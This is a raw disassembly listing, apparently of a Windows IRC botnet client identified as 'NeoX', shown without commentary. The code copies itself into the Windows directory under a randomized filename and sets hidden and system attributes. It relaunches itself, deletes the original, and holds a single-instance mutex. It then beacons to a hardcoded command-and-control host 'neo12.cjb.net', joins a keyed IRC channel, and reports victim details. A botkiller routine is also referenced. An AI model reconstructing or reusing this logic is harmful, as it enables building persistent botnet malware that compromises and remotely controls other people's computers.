lea eax, [ebp+Dest]
push eax
push [ebp+arg_0]
call dword_426470 ; send
leave
retn
sub_40A03C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A08D proc near ; CODE XREF: .text:00403A34�p
; sub_403C1E+7FA�p ...
Count = dword ptr -408h
Dest = byte ptr -404h
var_204 = byte ptr -204h
Str = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 408h
push esi
cmp [ebp+arg_C], 0
jz short loc_40A0A6
mov [ebp+Str], offset aNotice ; "NOTICE"
jmp short loc_40A0AD
; ---------------------------------------------------------------------------
loc_40A0A6: ; CODE XREF: sub_40A08D+E�j
mov [ebp+Str], offset aPrivmsg ; "PRIVMSG"
loc_40A0AD: ; CODE XREF: sub_40A08D+17�j
push [ebp+Str] ; Str
call _strlen
pop ecx
mov esi, 200h
sub esi, eax
push [ebp+arg_4] ; Str
call _strlen
pop ecx
sub esi, eax
sub esi, 6
mov [ebp+Count], esi
push [ebp+arg_8]
push offset aS_0 ; "%s"
push [ebp+Count] ; Count
lea eax, [ebp+var_204]
push eax ; Dest
call __snprintf
add esp, 10h
lea eax, [ebp+var_204]
push eax
push [ebp+arg_4]
push [ebp+Str]
push offset aSSS ; "%s %s :%s\r\n"
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
add esp, 14h
push 0
lea eax, [ebp+Dest]
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+Dest]
push eax
push [ebp+arg_0]
call dword_426470 ; send
cmp [ebp+arg_10], 0
jz short loc_40A140
push 7D0h ; dwMilliseconds
call ds:Sleep ; Sleep
loc_40A140: ; CODE XREF: sub_40A08D+A6�j
pop esi
leave
retn
sub_40A08D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __stdcall WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nShowCmd)
_WinMain@16 proc near ; CODE XREF: start+C9�p
var_9A0 = byte ptr -9A0h
hObject = dword ptr -99Ch
var_998 = dword ptr -998h
ProcessInformation= _PROCESS_INFORMATION ptr -994h
var_984 = dword ptr -984h
Dest = byte ptr -980h
var_87C = dword ptr -87Ch
StartupInfo = _STARTUPINFOA ptr -878h
CommandLine = byte ptr -834h
var_730 = dword ptr -730h
var_72C = word ptr -72Ch
var_59C = dword ptr -59Ch
Ext = byte ptr -598h
CurrentDirectory= byte ptr -498h
Source = byte ptr -394h
ExistingFileName= byte ptr -314h
var_210 = dword ptr -210h
var_20C = dword ptr -20Ch
var_208 = dword ptr -208h
Filename = byte ptr -204h
Str = byte ptr -104h
hInstance = dword ptr 8
hPrevInstance = dword ptr 0Ch
lpCmdLine = dword ptr 10h
nShowCmd = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 9A0h
push ebx
push esi
push edi
and [ebp+var_210], 0
and [ebp+var_20C], 0
and [ebp+var_59C], 0
and [ebp+var_730], 0
mov [ebp+var_208], offset sub_409C28
push [ebp+var_208]
push large dword ptr fs:0
mov large fs:0, esp
call ds:GetTickCount ; GetTickCount
xor edx, edx
mov ecx, 3E8h
div ecx
mov dword_4700D0, eax
call ds:GetTickCount ; GetTickCount
push eax
call sub_412333
pop ecx
call sub_407087
push 2
call dword_4264CC ; SetErrorMode
push 7530h ; dwMilliseconds
push offset aNeox ; "NeoX"
push 0 ; bInitialOwner
push 0 ; lpMutexAttributes
call ds:CreateMutexA ; CreateMutexA
push eax ; hHandle
call ds:WaitForSingleObject ; WaitForSingleObject
cmp eax, 102h
jnz short loc_40A1E1
push 1 ; uExitCode
call ds:ExitProcess ; ExitProcess
; ---------------------------------------------------------------------------
loc_40A1E1: ; CODE XREF: WinMain(x,x,x,x)+94�j
lea eax, [ebp+var_72C]
push eax
push 202h
call dword_4263B4 ; WSAStartup
mov [ebp+var_20C], eax
cmp [ebp+var_20C], 0
jz short loc_40A209
xor eax, eax
jmp loc_40A76F
; ---------------------------------------------------------------------------
loc_40A209: ; CODE XREF: WinMain(x,x,x,x)+BD�j
movzx eax, [ebp+var_72C]
and eax, 0FFh
movzx eax, al
cmp eax, 2
jnz short loc_40A22F
movzx eax, [ebp+var_72C]
shr eax, 8
movzx eax, al
cmp eax, 2
jz short loc_40A23C
loc_40A22F: ; CODE XREF: WinMain(x,x,x,x)+D8�j
call dword_42639C ; WSACleanup
xor eax, eax
jmp loc_40A76F
; ---------------------------------------------------------------------------
loc_40A23C: ; CODE XREF: WinMain(x,x,x,x)+EA�j
push 104h ; uSize
lea eax, [ebp+CurrentDirectory]
push eax ; lpBuffer
call ds:GetWindowsDirectoryA ; GetWindowsDirectoryA
push 104h ; nSize
lea eax, [ebp+ExistingFileName]
push eax ; lpFilename
push 0 ; lpModuleName
call ds:GetModuleHandleA ; GetModuleHandleA
push eax ; hModule
call ds:GetModuleFileNameA ; GetModuleFileNameA
lea eax, [ebp+Ext]
push eax ; Ext
lea eax, [ebp+Filename]
push eax ; Filename
push 0 ; Dir
push 0 ; Drive
lea eax, [ebp+ExistingFileName]
push eax ; FullPath
call __splitpath
add esp, 14h
lea eax, [ebp+Ext]
push eax
lea eax, [ebp+Filename]
push eax
push offset aSS ; "%s%s"
push 104h ; Count
lea eax, [ebp+Str]
push eax ; Dest
call __snprintf
add esp, 14h
lea eax, [ebp+CurrentDirectory]
push eax ; SubStr
lea eax, [ebp+ExistingFileName]
push eax ; Str
call _strstr
pop ecx
pop ecx
test eax, eax
jnz loc_40A4D8
cmp dword_470240, 0
jz short loc_40A31F
and [ebp+var_210], 0
jmp short loc_40A2ED
; ---------------------------------------------------------------------------
loc_40A2E0: ; CODE XREF: WinMain(x,x,x,x)+1DA�j
mov eax, [ebp+var_210]
inc eax
mov [ebp+var_210], eax
loc_40A2ED: ; CODE XREF: WinMain(x,x,x,x)+19B�j
push offset String2 ; "Nrzi.exe"
call _strlen
pop ecx
sub eax, 4
cmp [ebp+var_210], eax
jnb short loc_40A31F
call _rand
cdq
push 1Ah
pop ecx
idiv ecx
add edx, 61h
mov eax, [ebp+var_210]
mov byte ptr String2[eax], dl ; "Nrzi.exe"
jmp short loc_40A2E0
; ---------------------------------------------------------------------------
loc_40A31F: ; CODE XREF: WinMain(x,x,x,x)+192�j
; WinMain(x,x,x,x)+1BE�j
push offset String2 ; "Nrzi.exe"
lea eax, [ebp+CurrentDirectory]
push eax
push offset aSS_0 ; "%s\\%s"
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
add esp, 10h
lea eax, [ebp+Dest]
push eax ; lpFileName
call ds:GetFileAttributesA ; GetFileAttributesA
cmp eax, 0FFFFFFFFh
jz short loc_40A363
push 80h ; dwFileAttributes
lea eax, [ebp+Dest]
push eax ; lpFileName
call ds:SetFileAttributesA ; SetFileAttributesA
loc_40A363: ; CODE XREF: WinMain(x,x,x,x)+20C�j
and [ebp+var_87C], 0
loc_40A36A: ; CODE XREF: WinMain(x,x,x,x):loc_40A3C4�j
push 0 ; bFailIfExists
lea eax, [ebp+Dest]
push eax ; lpNewFileName
lea eax, [ebp+ExistingFileName]
push eax ; lpExistingFileName
call ds:CopyFileA ; CopyFileA
test eax, eax
jnz short loc_40A3C6
call ds:GetLastError
mov [ebp+var_998], eax
cmp [ebp+var_87C], 0
jnz short loc_40A3C2
cmp [ebp+var_998], 20h
jz short loc_40A3AB
cmp [ebp+var_998], 5
jnz short loc_40A3C2
loc_40A3AB: ; CODE XREF: WinMain(x,x,x,x)+25D�j
mov [ebp+var_87C], 1
push 3A98h ; dwMilliseconds
call ds:Sleep ; Sleep
jmp short loc_40A3C4
; ---------------------------------------------------------------------------
loc_40A3C2: ; CODE XREF: WinMain(x,x,x,x)+254�j
; WinMain(x,x,x,x)+266�j
jmp short loc_40A3C6
; ---------------------------------------------------------------------------
loc_40A3C4: ; CODE XREF: WinMain(x,x,x,x)+27D�j
jmp short loc_40A36A
; ---------------------------------------------------------------------------
loc_40A3C6: ; CODE XREF: WinMain(x,x,x,x)+23F�j
; WinMain(x,x,x,x):loc_40A3C2�j
lea eax, [ebp+Dest]
push eax ; lpFileName
call sub_4084A5
pop ecx
push 7 ; dwFileAttributes
lea eax, [ebp+Dest]
push eax ; lpFileName
call ds:SetFileAttributesA ; SetFileAttributesA
push 10h ; Size
push 0 ; Val
lea eax, [ebp+ProcessInformation]
push eax ; Dst
call _memset
add esp, 0Ch
push 44h ; Size
push 0 ; Val
lea eax, [ebp+StartupInfo]
push eax ; Dst
call _memset
add esp, 0Ch
mov [ebp+StartupInfo.lpTitle], offset dword_47025C
mov [ebp+StartupInfo.cb], 44h
mov [ebp+StartupInfo.dwFlags], 1
and [ebp+StartupInfo.wShowWindow], 0
call ds:GetCurrentProcessId ; GetCurrentProcessId
push eax ; dwProcessId
push 1 ; bInheritHandle
push 100000h ; dwDesiredAccess
call ds:OpenProcess ; OpenProcess
mov [ebp+var_984], eax
lea eax, [ebp+ExistingFileName]
push eax
push [ebp+var_984]
lea eax, [ebp+Dest]
push eax
push offset aSDS ; "%s %d \"%s\""
lea eax, [ebp+CommandLine]
push eax ; Dest
call _sprintf
add esp, 14h
lea eax, [ebp+ProcessInformation]
push eax ; lpProcessInformation
lea eax, [ebp+StartupInfo]
push eax ; lpStartupInfo
lea eax, [ebp+CurrentDirectory]
push eax ; lpCurrentDirectory
push 0 ; lpEnvironment
push 28h ; dwCreationFlags
push 1 ; bInheritHandles
push 0 ; lpThreadAttributes
push 0 ; lpProcessAttributes
lea eax, [ebp+CommandLine]
push eax ; lpCommandLine
lea eax, [ebp+Dest]
push eax ; lpApplicationName
call ds:CreateProcessA ; CreateProcessA
test eax, eax
jz short loc_40A4D8
push 0C8h ; dwMilliseconds
call ds:Sleep ; Sleep
push [ebp+ProcessInformation.hProcess] ; hObject
call ds:CloseHandle ; CloseHandle
push [ebp+ProcessInformation.hThread] ; hObject
call ds:CloseHandle ; CloseHandle
call dword_42639C ; WSACleanup
push 0 ; uExitCode
call ds:ExitProcess ; ExitProcess
; ---------------------------------------------------------------------------
loc_40A4D8: ; CODE XREF: WinMain(x,x,x,x)+185�j
; WinMain(x,x,x,x)+362�j
cmp dword_4702C8, 2
jle short loc_40A533
mov eax, dword_4702CC
push dword ptr [eax+4] ; Str
call _atoi
pop ecx
mov [ebp+hObject], eax
push 0FFFFFFFFh ; dwMilliseconds
push [ebp+hObject] ; hHandle
call ds:WaitForSingleObject ; WaitForSingleObject
push [ebp+hObject] ; hObject
call ds:CloseHandle ; CloseHandle
mov eax, dword_4702CC
cmp dword ptr [eax+8], 0
jz short loc_40A533
push 7D0h ; dwMilliseconds
call ds:Sleep ; Sleep
mov eax, dword_4702CC
push dword ptr [eax+8] ; lpFileName
call ds:DeleteFileA ; DeleteFileA
loc_40A533: ; CODE XREF: WinMain(x,x,x,x)+39C�j
; WinMain(x,x,x,x)+3D5�j
cmp dword_421C40, 0
jz short loc_40A552
cmp dword_4264EC, 0
jnz short loc_40A552
lea eax, [ebp+Str]
push eax ; Str
call sub_40954C
pop ecx
loc_40A552: ; CODE XREF: WinMain(x,x,x,x)+3F7�j
; WinMain(x,x,x,x)+400�j
push offset dword_421E54 ; Format
lea eax, [ebp+Source]
push eax ; Dest
call _sprintf
pop ecx
pop ecx
push 0 ; int
push 0 ; int
lea eax, [ebp+Source]
push eax ; Source
call sub_410231
add esp, 0Ch
lea eax, [ebp+Source]
push eax
call sub_40913D
pop ecx
push 0B80h ; Size
push 0 ; Val
push offset byte_42A7C0 ; Dst
call _memset
add esp, 0Ch
call _rand
xor edx, edx
push 1
pop ecx
div ecx
mov dword_470258, edx
push 7Fh ; Count
push offset Source ; "neo12.cjb.net"
push offset aNeo12_cjb_ne_0 ; "neo12.cjb.net"
call _strncpy
add esp, 0Ch
mov eax, dword_421C30
mov dword_47022C, eax
push 3Fh ; Count
push offset aNhg ; "#!nhg!#"
push offset aNhg_0 ; "#!nhg!#"
call _strncpy
add esp, 0Ch
push 3Fh ; Count
push offset aAsdasd ; "asdasd"
push offset aAsdasd_0 ; "asdasd"
call _strncpy
add esp, 0Ch
and dword_470230, 0
loc_40A5F8: ; CODE XREF: WinMain(x,x,x,x):loc_40A75D�j
push 1
pop eax
test eax, eax
jz loc_40A762
and [ebp+var_210], 0
jmp short loc_40A619
; ---------------------------------------------------------------------------
loc_40A60C: ; CODE XREF: WinMain(x,x,x,x)+506�j
; WinMain(x,x,x,x)+54B�j
mov eax, [ebp+var_210]
inc eax
mov [ebp+var_210], eax
loc_40A619: ; CODE XREF: WinMain(x,x,x,x)+4C7�j
cmp [ebp+var_210], 6
jge short loc_40A693
cmp dword_426504, 0
jnz short loc_40A64B
push 0
lea eax, [ebp+var_9A0]
push eax
call dword_42638C ; InternetGetConnectedState
test eax, eax
jnz short loc_40A64B
push 7530h ; dwMilliseconds
call ds:Sleep ; Sleep
jmp short loc_40A60C
; ---------------------------------------------------------------------------
loc_40A64B: ; CODE XREF: WinMain(x,x,x,x)+4E6�j
; WinMain(x,x,x,x)+4F9�j
and dword_470254, 0
push offset dword_4700D8
call sub_40A776
mov [ebp+var_20C], eax
cmp [ebp+var_20C], 2
jnz short loc_40A66D
jmp short loc_40A693
; ---------------------------------------------------------------------------
loc_40A66D: ; CODE XREF: WinMain(x,x,x,x)+526�j
cmp dword_470254, 0
jz short loc_40A683
mov eax, [ebp+var_210]
dec eax
mov [ebp+var_210], eax
loc_40A683: ; CODE XREF: WinMain(x,x,x,x)+531�j
push 0BB8h ; dwMilliseconds
call ds:Sleep ; Sleep
jmp loc_40A60C
; ---------------------------------------------------------------------------
loc_40A693: ; CODE XREF: WinMain(x,x,x,x)+4DD�j
; WinMain(x,x,x,x)+528�j
cmp [ebp+var_20C], 2
jnz short loc_40A6A1
jmp loc_40A762
; ---------------------------------------------------------------------------
loc_40A6A1: ; CODE XREF: WinMain(x,x,x,x)+557�j
cmp [ebp+var_730], 0
jz short loc_40A6F9
push 7Fh ; Count
push offset Source ; "neo12.cjb.net"
push offset aNeo12_cjb_ne_0 ; "neo12.cjb.net"
call _strncpy
add esp, 0Ch
mov eax, dword_421C30
mov dword_47022C, eax
push 3Fh ; Count
push offset aNhg ; "#!nhg!#"
push offset aNhg_0 ; "#!nhg!#"
call _strncpy
add esp, 0Ch
push 3Fh ; Count
push offset aAsdasd ; "asdasd"
push offset aAsdasd_0 ; "asdasd"
call _strncpy
add esp, 0Ch
and [ebp+var_730], 0
jmp short loc_40A75D
; ---------------------------------------------------------------------------
loc_40A6F9: ; CODE XREF: WinMain(x,x,x,x)+565�j
cmp [ebp+var_730], 0
jnz short loc_40A75D
movsx eax, byte_470248
test eax, eax
jz short loc_40A75D
push 7Fh ; Count
push offset byte_470248 ; Source
push offset aNeo12_cjb_ne_0 ; "neo12.cjb.net"
call _strncpy
add esp, 0Ch
mov eax, dword_421C34
mov dword_47022C, eax
push 3Fh ; Count
push offset byte_47024C ; Source
push offset aNhg_0 ; "#!nhg!#"
call _strncpy
add esp, 0Ch
push 3Fh ; Count
push offset byte_470250 ; Source
push offset aAsdasd_0 ; "asdasd"
call _strncpy
add esp, 0Ch
mov [ebp+var_730], 1
loc_40A75D: ; CODE XREF: WinMain(x,x,x,x)+5B4�j
; WinMain(x,x,x,x)+5BD�j ...
jmp loc_40A5F8
; ---------------------------------------------------------------------------
loc_40A762: ; CODE XREF: WinMain(x,x,x,x)+4BA�j
; WinMain(x,x,x,x)+559�j
call sub_41050C
call dword_42639C ; WSACleanup
xor eax, eax
loc_40A76F: ; CODE XREF: WinMain(x,x,x,x)+C1�j
; WinMain(x,x,x,x)+F4�j
pop edi
pop esi
pop ebx
leave
retn 10h
_WinMain@16 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A776 proc near ; CODE XREF: WinMain(x,x,x,x)+514�p
Parameter = dword ptr -1B4h
var_1B0 = dword ptr -1B0h
var_1AC = dword ptr -1ACh
var_1A8 = dword ptr -1A8h
var_1A4 = dword ptr -1A4h
ThreadId = dword ptr -1A0h
Source = dword ptr -19Ch
Dst = word ptr -198h
var_196 = word ptr -196h
var_194 = dword ptr -194h
Dest = byte ptr -188h
var_16C = dword ptr -16Ch
var_168 = dword ptr -168h
var_164 = byte ptr -164h
var_E4 = byte ptr -0E4h
var_A4 = byte ptr -0A4h
var_64 = byte ptr -64h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1B4h
push esi
push edi
and [ebp+ThreadId], 0
mov esi, [ebp+arg_0]
push 59h
pop ecx
lea edi, [ebp+var_168]
rep movsd
mov eax, [ebp+arg_0]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
mov dword ptr [eax+160h], 1
loc_40A7A9: ; CODE XREF: sub_40A776+139�j
; sub_40A776+232�j ...
push 1
pop eax
test eax, eax
jz loc_40A9D6
push 10h ; Size
push 0 ; Val
lea eax, [ebp+Dst]
push eax ; Dst
call _memset
add esp, 0Ch
mov [ebp+Dst], 2
push [ebp+var_14]
call dword_426424 ; ntohs
mov [ebp+var_196], ax
lea eax, [ebp+var_164]
push eax
call sub_4088D0
pop ecx
mov [ebp+var_194], eax
cmp [ebp+var_194], 0
jnz short loc_40A803
xor eax, eax
jmp loc_40A9E5
; ---------------------------------------------------------------------------
loc_40A803: ; CODE XREF: sub_40A776+84�j
push 1Ch ; Size
push 0 ; Val
lea eax, [ebp+Dest]
push eax ; Dst
call _memset
add esp, 0Ch
push 0 ; Str1
push dword_421C4C ; int
lea eax, [ebp+Dest]
push eax ; Dest
call sub_40FD9A
add esp, 0Ch
mov [ebp+Source], eax
push 1Bh ; Count
push [ebp+Source] ; Source
mov eax, [ebp+var_C]
imul eax, 234h
add eax, offset aUsaXpSp2667553 ; "USA|XP|SP2|667553"
push eax ; Dest
call _strncpy
add esp, 0Ch
push 6
push 1
push 2
call dword_4264A0 ; socket
mov [ebp+var_1A4], eax
mov eax, [ebp+var_C]
imul eax, 234h
mov ecx, [ebp+var_1A4]
mov dword_42B54C[eax], ecx
push 10h
lea eax, [ebp+Dst]
push eax
push [ebp+var_1A4]
call dword_4263D8 ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_40A8B4
push [ebp+var_1A4]
call dword_4264B8 ; closesocket
call sub_408910
push 7D0h ; dwMilliseconds
call ds:Sleep ; Sleep
jmp loc_40A7A9
; ---------------------------------------------------------------------------
loc_40A8B4: ; CODE XREF: sub_40A776+11B�j
lea eax, [ebp+var_164]
push eax ; char
push offset dword_421E7C ; Format
call sub_4091D3
pop ecx
pop ecx
cmp dword_421D24, 0
jz loc_40A957
mov eax, [ebp+var_1A4]
mov [ebp+Parameter], eax
and [ebp+var_1AC], 0
push 0 ; int
push 21h ; int
push offset a_n_z_m_Botkill ; ".n.z.m. (botkiller.p.l.g) .. Botkill"...
call sub_410231
add esp, 0Ch
mov [ebp+var_1B0], eax
lea eax, [ebp+ThreadId]
push eax ; lpThreadId
push 0 ; dwCreationFlags
lea eax, [ebp+Parameter]
push eax ; lpParameter
push offset sub_405D52 ; lpStartAddress
push 0 ; dwStackSize
push 0 ; lpThreadAttributes
call ds:CreateThread ; CreateThread
mov ecx, [ebp+var_1B0]
imul ecx, 234h
mov dword_42B554[ecx], eax
mov eax, [ebp+var_1B0]
imul eax, 234h
cmp dword_42B554[eax], 0
jz short loc_40A957
loc_40A944: ; CODE XREF: sub_40A776+1DF�j
cmp [ebp+var_1A8], 0
jnz short loc_40A957
push 32h ; dwMilliseconds
call ds:Sleep ; Sleep
jmp short loc_40A944
; ---------------------------------------------------------------------------
loc_40A957: ; CODE XREF: sub_40A776+158�j
; sub_40A776+1CC�j ...
push [ebp+var_10]
lea eax, [ebp+var_164]
push eax
lea eax, [ebp+var_64]
push eax
push [ebp+var_168]
push [ebp+Source]
lea eax, [ebp+var_A4]
push eax
lea eax, [ebp+var_E4]
push eax
push [ebp+var_1A4]
call sub_40A9EB
add esp, 20h
mov [ebp+var_16C], eax
push [ebp+var_1A4]
call dword_4264B8 ; closesocket
cmp [ebp+var_16C], 0
jnz short loc_40A9AD
jmp loc_40A7A9
; ---------------------------------------------------------------------------
loc_40A9AD: ; CODE XREF: sub_40A776+230�j
cmp [ebp+var_16C], 1
jnz short loc_40A9C6
push 0DBBA0h ; dwMilliseconds
call ds:Sleep ; Sleep
jmp loc_40A7A9
; ---------------------------------------------------------------------------
loc_40A9C6: ; CODE XREF: sub_40A776+23E�j
cmp [ebp+var_16C], 2
jnz short loc_40A9D1
jmp short loc_40A9D6
; ---------------------------------------------------------------------------
loc_40A9D1: ; CODE XREF: sub_40A776+257�j
jmp loc_40A7A9
; ---------------------------------------------------------------------------
loc_40A9D6: ; CODE XREF: sub_40A776+38�j
; sub_40A776+259�j
push [ebp+var_C]
call sub_410709
pop ecx
mov eax, [ebp+var_16C]
loc_40A9E5: ; CODE XREF: sub_40A776+88�j
pop edi
pop esi
leave
retn 4
sub_40A776 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A9EB proc near ; CODE XREF: sub_40A776+20F�p
var_1A18 = dword ptr -1A18h
Str = byte ptr -1A14h
Dst = byte ptr -1994h
var_994 = dword ptr -994h
Src = dword ptr -990h
var_1C0 = dword ptr -1C0h
var_1BC = dword ptr -1BCh
var_1B8 = dword ptr -1B8h
Dest = byte ptr -0B8h
var_A4 = dword ptr -0A4h
var_4 = dword ptr -4
s = dword ptr 8
arg_4 = byte ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
mov eax, 1A18h
call __alloca_probe
and [ebp+var_4], 0
and [ebp+var_1C0], 0
jmp short loc_40AA12
; ---------------------------------------------------------------------------
loc_40AA05: ; CODE XREF: sub_40A9EB+41�j
mov eax, [ebp+var_1C0]
inc eax
mov [ebp+var_1C0], eax
loc_40AA12: ; CODE XREF: sub_40A9EB+18�j
cmp [ebp+var_1C0], 2
jge short loc_40AA2E
mov eax, [ebp+var_1C0]
shl eax, 7
and byte ptr [ebp+eax+var_1B8], 0
jmp short loc_40AA05
; ---------------------------------------------------------------------------
loc_40AA2E: ; CODE XREF: sub_40A9EB+2E�j
movsx eax, byte_470244
test eax, eax
jz short loc_40AA4E
push offset byte_470244 ; char
push offset aPassS ; "PASS %s\r\n"
push [ebp+s] ; int
call sub_40A03C
add esp, 0Ch
loc_40AA4E: ; CODE XREF: sub_40A9EB+4C�j
push [ebp+arg_C]
push 0 ; Str1
push 0 ; int
lea eax, [ebp+Dest]
push eax ; Dest
call sub_40FD9A
add esp, 0Ch
push eax
push [ebp+arg_C]
push offset aNickSUserS00S ; "NICK %s\r\nUSER %s 0 0 :%s\r\n"
lea eax, [ebp+Str]
push eax ; Dest
call _sprintf
add esp, 14h
push 0
lea eax, [ebp+Str]
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+Str]
push eax
push [ebp+s]
call dword_426470 ; send
cmp eax, 0FFFFFFFFh
jnz short loc_40AABC
push [ebp+s]
call dword_4264B8 ; closesocket
push 1388h ; dwMilliseconds
call ds:Sleep ; Sleep
xor eax, eax
jmp locret_40ABFC
; ---------------------------------------------------------------------------
loc_40AABC: ; CODE XREF: sub_40A9EB+B4�j
; sub_40A9EB:loc_40ABF5�j
push 1
pop eax
test eax, eax
jz loc_40ABFA
push 1000h ; Size
push 0 ; Val
lea eax, [ebp+Dst]
push eax ; Dst
call _memset
add esp, 0Ch
push 0
push 1000h
lea eax, [ebp+Dst]
push eax
push [ebp+s]
call dword_42643C ; recv
test eax, eax
jg short loc_40AAFD
jmp loc_40ABFA
; ---------------------------------------------------------------------------
loc_40AAFD: ; CODE XREF: sub_40A9EB+10B�j
lea eax, [ebp+Src]
push eax ; int
lea eax, [ebp+Dst]
push eax ; Str
call sub_408014
pop ecx
pop ecx
mov [ebp+var_1C0], eax
and [ebp+var_994], 0
jmp short loc_40AB2E
; ---------------------------------------------------------------------------
loc_40AB21: ; CODE XREF: sub_40A9EB:loc_40ABF0�j
mov eax, [ebp+var_994]
inc eax
mov [ebp+var_994], eax
loc_40AB2E: ; CODE XREF: sub_40A9EB+134�j
mov eax, [ebp+var_994]
cmp eax, [ebp+var_1C0]
jge loc_40ABF5
mov [ebp+var_1BC], 1
loc_40AB4A: ; CODE XREF: sub_40A9EB+1CC�j
push [ebp+arg_1C] ; int
push [ebp+var_1BC] ; int
lea eax, [ebp+var_4]
push eax ; int
lea eax, [ebp+var_A4]
push eax ; int
lea eax, [ebp+var_1B8]
push eax ; int
push [ebp+arg_18] ; int
push [ebp+arg_C] ; Dest
push [ebp+arg_8] ; int
push dword ptr [ebp+arg_4] ; char
push [ebp+s] ; s
mov eax, [ebp+var_994]
push [ebp+eax*4+Src] ; Src
call sub_40ABFE
add esp, 2Ch
mov [ebp+var_1BC], eax
mov eax, [ebp+var_1BC]
dec eax
mov [ebp+var_1BC], eax
cmp [ebp+var_1BC], 0
jle short loc_40ABB0
push 7D0h ; dwMilliseconds
call ds:Sleep ; Sleep
loc_40ABB0: ; CODE XREF: sub_40A9EB+1B8�j
cmp [ebp+var_1BC], 0
jg short loc_40AB4A
mov eax, [ebp+var_1BC]
mov [ebp+var_1A18], eax
cmp [ebp+var_1A18], 0FFFFFFFDh
jz short loc_40ABEB
cmp [ebp+var_1A18], 0FFFFFFFEh
jz short loc_40ABE6
cmp [ebp+var_1A18], 0FFFFFFFFh
jz short loc_40ABE2
jmp short loc_40ABF0
; ---------------------------------------------------------------------------
loc_40ABE2: ; CODE XREF: sub_40A9EB+1F3�j
xor eax, eax
jmp short locret_40ABFC
; ---------------------------------------------------------------------------
loc_40ABE6: ; CODE XREF: sub_40A9EB+1EA�j
push 1
pop eax
jmp short locret_40ABFC
; ---------------------------------------------------------------------------
loc_40ABEB: ; CODE XREF: sub_40A9EB+1E1�j
push 2
pop eax
jmp short locret_40ABFC
; ---------------------------------------------------------------------------
loc_40ABF0: ; CODE XREF: sub_40A9EB+1F5�j
jmp loc_40AB21
; ---------------------------------------------------------------------------
loc_40ABF5: ; CODE XREF: sub_40A9EB+14F�j
jmp loc_40AABC
; ---------------------------------------------------------------------------
loc_40ABFA: ; CODE XREF: sub_40A9EB+D6�j
; sub_40A9EB+10D�j
xor eax, eax
locret_40ABFC: ; CODE XREF: sub_40A9EB+CC�j
; sub_40A9EB+1F9�j ...
leave
retn
sub_40A9EB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40ABFE(char *Src, SOCKET s, char, int, char *Dest, int, int, int, int, int, int)
sub_40ABFE proc near ; CODE XREF: sub_40A9EB+196�p
var_1964 = dword ptr -1964h
var_1960 = dword ptr -1960h
var_195C = dword ptr -195Ch
var_1958 = dword ptr -1958h
var_1954 = dword ptr -1954h
var_1950 = dword ptr -1950h
var_194C = dword ptr -194Ch
var_1948 = dword ptr -1948h
var_1944 = dword ptr -1944h
var_1940 = dword ptr -1940h
var_193C = dword ptr -193Ch
var_1938 = dword ptr -1938h
var_1934 = dword ptr -1934h
var_1930 = dword ptr -1930h
var_192C = dword ptr -192Ch
Format = dword ptr -1928h
var_1924 = dword ptr -1924h
var_1920 = byte ptr -1920h
var_191C = dword ptr -191Ch
namelen = dword ptr -1918h
name = sockaddr ptr -1914h
var_1904 = byte ptr -1904h
var_18F4 = byte ptr -18F4h
var_1874 = byte ptr -1874h
var_17F4 = dword ptr -17F4h
var_17F0 = dword ptr -17F0h
var_17EC = dword ptr -17ECh
var_17E8 = dword ptr -17E8h
var_17E4 = dword ptr -17E4h
var_17D8 = dword ptr -17D8h
var_17D4 = dword ptr -17D4h
var_17CC = dword ptr -17CCh
var_17C8 = dword ptr -17C8h
var_17C4 = dword ptr -17C4h
var_17C0 = dword ptr -17C0h
var_17B8 = dword ptr -17B8h
var_17B4 = dword ptr -17B4h
var_17B0 = byte ptr -17B0h
var_1730 = byte ptr -1730h
var_1630 = byte ptr -1630h
var_1530 = dword ptr -1530h
var_152C = dword ptr -152Ch
var_1528 = dword ptr -1528h
var_1524 = dword ptr -1524h
var_1520 = dword ptr -1520h
var_151C = dword ptr -151Ch
var_1518 = dword ptr -1518h
var_1514 = dword ptr -1514h
var_1510 = dword ptr -1510h
var_150C = dword ptr -150Ch
var_1508 = dword ptr -1508h
var_1504 = byte ptr -1504h
var_1404 = byte ptr -1404h
var_1384 = dword ptr -1384h
var_1380 = dword ptr -1380h
var_137C = dword ptr -137Ch
var_1378 = dword ptr -1378h
var_1374 = dword ptr -1374h
var_1370 = dword ptr -1370h
var_136C = dword ptr -136Ch
var_1368 = byte ptr -1368h
var_1348 = byte ptr -1348h
var_1248 = byte ptr -1248h
var_11C8 = byte ptr -11C8h
var_1148 = byte ptr -1148h
var_10C8 = dword ptr -10C8h
var_10C4 = dword ptr -10C4h
var_10C0 = dword ptr -10C0h
Buffer = byte ptr -10BCh
var_FB8 = byte ptr -0FB8h
var_F9C = dword ptr -0F9Ch
var_F98 = byte ptr -0F98h
var_F18 = byte ptr -0F18h
var_E18 = byte ptr -0E18h
var_D18 = dword ptr -0D18h
var_D14 = dword ptr -0D14h
var_D10 = dword ptr -0D10h
var_D0C = dword ptr -0D0Ch
var_D08 = dword ptr -0D08h
var_D04 = dword ptr -0D04h
var_D00 = dword ptr -0D00h
var_CFC = dword ptr -0CFCh
var_CF8 = dword ptr -0CF8h
var_CF4 = byte ptr -0CF4h
var_CF0 = dword ptr -0CF0h
var_CEC = dword ptr -0CECh
var_CE8 = dword ptr -0CE8h
var_CE4 = dword ptr -0CE4h
